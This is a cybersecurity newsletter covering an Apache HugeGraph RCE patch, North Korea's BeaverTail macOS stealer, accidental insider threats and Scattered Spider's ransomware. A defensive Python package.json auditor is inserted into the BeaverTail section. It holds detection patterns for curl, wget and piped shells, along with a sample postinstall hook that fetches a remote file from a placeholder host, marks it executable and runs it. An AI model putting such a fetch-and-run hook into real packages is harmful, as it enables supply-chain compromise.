DPRK Hackers Target Job Seekers with Sneaky New Malware Variant 🕵️‍♂️

Jul 19 2024



Welcome to Gone Phishing, your weekly cybersecurity newsletter that covers more info wars than Alex Jones 👨🏻‍💻 

Update 📰

FYI, we’ve decided to change the way we bring you the latest in all things cybersecurity. 💡

Instead of clogging up your inboxes with daily doses of web wisdom, we’re going to pack a week’s worth of news and tips into one weekly newsletter which will go out every Friday. 📅

It’ll contain old favourites like Patch of the Week 🩹, along with some exciting new stuff! 🎉 You’ll still receive the odd weekend special from us too. Okay, enough yapping… Hope you enjoy our new and improved Gone Phishing newsletter! 🥂

Patch of the Week! 🩹

First things first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it… 😳

Congrats to Apache, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

HugeGraph leads to Huge Gaff 🙃

🚨 Apache HugeGraph-Server Under Attack! 💥

Hackers are exploiting a critical flaw in Apache HugeGraph-Server (CVE-2024-27348, CVSS 9.8) that allows remote code execution! 💻🚨 All versions before 1.3.0 are affected. Update to version 1.3.0 with Java 11 and enable the Auth system and 'Whitelist-IP/port' for extra security! 🚀 SecureLayer7 warns of code execution risks, and Shadowserver Foundation has observed active exploitation attempts. 🕵️‍♂️💥 Don't wait – update now to stay safe! 🌐🔒

🔥 Cybersecurity Hot Topics in Briefs 🩲

🛡️ US-Led Operation Crushes Massive Botnet 🛡️

A major victory for global cybersecurity as the US Justice Department dismantled the 911 S5 botnet, believed to be the world's largest. This botnet was used for various cybercrimes, affecting over 19 million IP addresses worldwide (World Economic Forum).

💥 Ransomware Hits Key Water Utilities 💥

Ransomware attacks targeted Veolia in the US and Southern Water in the UK, causing significant disruptions. Veolia’s backend systems and servers were affected, while Southern Water faces a threat of data exposure unless a ransom is paid (World Economic Forum).

⚠️ Massive AT&T Data Breach ⚠️

A significant data breach at AT&T has exposed sensitive customer information. This breach is part of a broader trend of increasing cyber threats affecting large enterprises and critical infrastructure (Innovate Cybersecurity).

🏥 Cyberattack Disrupts London Hospitals 🏥

A cyberattack on a lab service provider for the NHS caused major disruptions at several London hospitals, including King's College Hospital. This incident underscores the vulnerabilities in healthcare infrastructure.

📈 AI's Role in Future Cyber Threats 📈

The UK's cybersecurity agency warns that generative AI will make phishing and social engineering attacks more convincing, posing a greater threat to all levels of cybersecurity understanding by 2025.

Now, on to today’s hottest cybersecurity news stories: 

  • 💻 macOS users beware! N. Korean hackers have updated BeaverTail 😨

  • 🔫 Friendly fire! Are your employees naively letting the wolf in the door? 🐺

  • 🕷️ Scattered Spider is back with a brand new invention: RansomHub, Qilin 👾

BeaverTail has Mac users chasing their tails 😬

🚨 DPRK Hackers Target Job Seekers with Sneaky New Malware Variant 🕵️‍♂️

Cybersecurity researchers have uncovered a new variant of stealer malware, this time posing as a legitimate macOS video call service called "MiroTalk.dmg." This crafty scheme, attributed to North Korean hackers, aims to infiltrate job seekers' devices.

🔍 What's the Deal?

The malware, dubbed BeaverTail, is part of a broader campaign known as Contagious Interview. This campaign has been targeting software developers through fake job interviews. Security researcher Patrick Wardle revealed that the malware, hidden in an Apple DMG file, can swipe sensitive data from browsers, crypto wallets, and even download more harmful payloads like the InvisibleFerret backdoor.

♟️ New Tactics

Previously spread via fake npm packages, the malware's new delivery method involves tricking victims into downloading the infected MiroTalk from a malicious site. Once executed, it steals data and instals further malware for persistent access.

🏞️ The Bigger Picture

Another related discovery involves a malicious npm package named call-blockflow, which mimics a legitimate library. Linked to the notorious Lazarus Group, this package was designed to download and execute remote binaries, masking its tracks to avoid detection. Despite being quickly removed, it managed 18 downloads.
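Both the npm angle of BeaverTail and the call-blockflow package above come down to the same shape: a package whose install-time hooks fetch and run remote code under a trustworthy-looking name. The following is an added example (ours, not code from the reports; the package names, the popular-package list and the URL are constructed samples) that audits a package.json for exactly those two signs before the package is installed:

```python
"""Audit an npm package manifest for two supply-chain warning signs:
install-time lifecycle hooks that fetch and run remote code, and a package
name that is a near-miss of a popular library. Added example, not code from
the campaign write-ups; names and URLs below are constructed samples."""
import json
import re

# Commands that pull content off the network from inside a lifecycle hook.
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|fetch\()", re.I)
# Ways a hook turns fetched content into running code.
EXEC_RE = re.compile(r"\|\s*(sh|bash)\b|\bchmod\s+\+x|\bnode\s+-e\b|\beval\s*\(", re.I)
HOOKS = ("preinstall", "install", "postinstall", "prepare")
POPULAR = ("lodash", "express", "axios", "chalk")  # constructed allowlist


def levenshtein(a: str, b: str) -> int:
    """Edit distance; used to spot typosquat-style package names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_manifest(text: str) -> list[str]:
    """Return human-readable findings for one package.json body (empty if clean)."""
    manifest = json.loads(text)
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook not in HOOKS:
            continue  # test/build scripts do not run on `npm install`
        if FETCH_RE.search(cmd):
            findings.append(f"{hook} downloads remote content: {cmd}")
        if EXEC_RE.search(cmd):
            findings.append(f"{hook} executes shell/downloaded code: {cmd}")
    name = manifest.get("name", "")
    for known in POPULAR:
        if name != known and levenshtein(name, known) <= 2:
            findings.append(f"name {name!r} is a near-miss of {known!r}")
    return findings


# Constructed samples: a benign native add-on and a typosquat-style package.
BENIGN = '{"name": "native-addon", "scripts": {"postinstall": "node-gyp rebuild"}}'
SUSPECT = ('{"name": "lodahs", "scripts": {"postinstall": '
           '"curl -s https://example.invalid/p -o /tmp/p && chmod +x /tmp/p && /tmp/p"}}')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, audit_manifest(doc) or ["no findings"])
```

Run it against the package.json of any dependency you are about to add; a hook that both fetches and executes is the pattern worth blocking at install time rather than after the fact.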

🔒 Stay Safe!

Stay vigilant, especially if you're job hunting or downloading software. Always verify sources and watch out for unexpected downloads. The wily DPRK hackers are constantly evolving their tactics!

Learn how to build custom GPTs & automate 50% of your workflow with AI

Don’t pay for sh*tty AI courses when you can learn it for FREE!

This incredible 3-hour Masterclass on AI & ChatGPT (worth $399) makes you a master of 25+ AI tools, hacks & prompting techniques to save 16 hours/week and do more with your time.

Get it now for absolutely free! (for first 100 users only) 🎁

This masterclass will teach you how to:

  • Do AI-driven data analysis to make quick business decisions

  • Make stunning PPTs & write content for emails, socials & more in minutes

  • Build AI assistants & custom bots in minutes

  • Solve complex problems, research 10x faster & make your simpler & easier

You’ll wish you knew about this FREE AI masterclass sooner 😉

Register & save your seat now! (valid for next 24 hours only!)

It was an inside job!! 🕵️‍♂️

🚨 Beware the Accidental Insider: A Hidden Threat to Your Network Security 🛡️

Sophisticated cyber threats often find creative ways to bypass even the most robust technical defences. While some attacks involve insiders with malicious intent, a growing concern lies with the accidental insider—employees who unintentionally compromise security. Here’s how they do it and what you can do to prevent it.

🔄 Accidental Insider Triggers

  • Lack of Awareness: Many employees fall prey to phishing emails or malware due to a lack of cybersecurity knowledge.

  • Pressure to Perform: Tight deadlines can lead employees to bypass security protocols.

  • Poor Credential Handling: Weak passwords and sharing credentials make unauthorised access easier.

  • Sneakernets: Unapproved data transfers using personal devices or cloud services create vulnerabilities.

🔑 Common Exploitation Methods

  • Phishing: Tricking employees into revealing credentials.

  • Malware: Accidental downloads can grant attackers elevated privileges.

  • Lateral Movement: Using compromised credentials to access sensitive data across the network.

  • Social Engineering: Manipulating insiders to divulge information or perform actions that benefit attackers.

💥 Consequences of Accidental Insider Attacks

  • Financial Losses: Data breaches lead to fines, legal costs, and expensive remediation.

  • Reputational Damage: Public disclosure of insider incidents can erode customer trust and business relationships.

  • Operational Disruption: Attacks can cause downtime, lost productivity, and hinder revenue generation.

  • Intellectual Property Theft: Competitors or foreign entities can exploit stolen information for a market advantage.

🛡️ Proactive Measures to Mitigate Risk

  • Security Awareness Training: Regularly educate employees on cybersecurity best practices.

  • Culture of Security: Promote a security-conscious environment where suspicious activities are reported.

  • User Activity Monitoring (UAM): Keep an eye on compliance with policies, especially for privileged users.

  • Content Disarm and Reconstruction (CDR): Remove threats from files before they enter your network.

  • Cross Domain Solutions: Ensure secure, policy-driven data transfers across security domains.

  • Adopt Best Practices: Follow guidelines from Carnegie Mellon SEI CERT, MITRE, NITTF, and CISA.

By implementing these measures, organisations can significantly reduce the risk posed by accidental insiders, ensuring a stronger defence against external attacks.

Our Spidey sense is tingling 🕷️

🚨 Scattered Spider's New Ransomware Arsenal: RansomHub and Qilin 🐍

The notorious cybercrime group Scattered Spider has upped its game, adding the potent ransomware strains RansomHub and Qilin to its toolkit, Microsoft reports.

🎭 Who is Scattered Spider?

Known for their sophisticated social engineering schemes, Scattered Spider breaches targets to exploit and steal data. They have a history of targeting VMware ESXi servers and deploying BlackCat ransomware. Also recognised as Gold Harvest, 0ktapus, Octo Tempest, and UNC3944, a key member was recently arrested in Spain.

💻 RansomHub: A Rising Threat

RansomHub, a rebranded version of the Knight ransomware, emerged this year. This ransomware-as-a-service (RaaS) payload is becoming popular among various threat actors, including those who previously used BlackCat. Microsoft notes its rapid spread and widespread use.

🔒 Expanding Threat Landscape

RansomHub is not limited to Scattered Spider. It has been used in post-compromise activities by groups like Evil Corp, following initial access via FakeUpdates infections. This development coincides with new ransomware families like FakePenny, Fog, and ShadowRoot.

🛡️ Stay Safe!

As ransomware threats evolve, Microsoft advises strict adherence to security best practices, especially credential hygiene, the principle of least privilege, and Zero Trust.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

